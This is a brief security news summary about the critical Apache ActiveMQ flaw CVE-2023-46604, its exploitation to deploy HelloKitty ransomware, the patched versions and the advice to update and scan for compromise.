November 2, 2023 at 05:30AM
Researchers have identified a critical security flaw in the Apache ActiveMQ message broker service that could allow remote code execution. The flaw has been exploited to deploy HelloKitty ransomware on target systems. The vulnerability has a severity score of 10.0 and has been addressed in the latest ActiveMQ versions. Users are advised to update immediately.
Key Takeaways from the Meeting Notes:
– Cybersecurity researchers have identified a critical security flaw in the Apache ActiveMQ open-source message broker service that allows for remote code execution.
– The vulnerability, known as CVE-2023-46604, has a maximum severity score of 10.0.
– The HelloKitty ransomware family is believed to be involved in exploiting this vulnerability.
– The intrusions aim to deploy ransomware binaries on target systems.
– Apache has released patched versions (5.15.16, 5.16.7, 5.17.6, or 5.18.3) to address the vulnerability.
– A proof-of-concept exploit code and technical details are publicly available.
– Successful exploitation involves loading remote binaries (M2.png and M4.png) using the Windows Installer.
– The loaded binaries execute ransomware behavior, encrypting files with the “.locked” extension.
– As of November 1, 2023, over 3,300 internet-accessible ActiveMQ instances are susceptible to CVE-2023-46604, with the majority located in China, the U.S., Germany, South Korea, and India.
– Users are strongly advised to update to the fixed version, scan their networks for indicators of compromise, and take necessary security measures.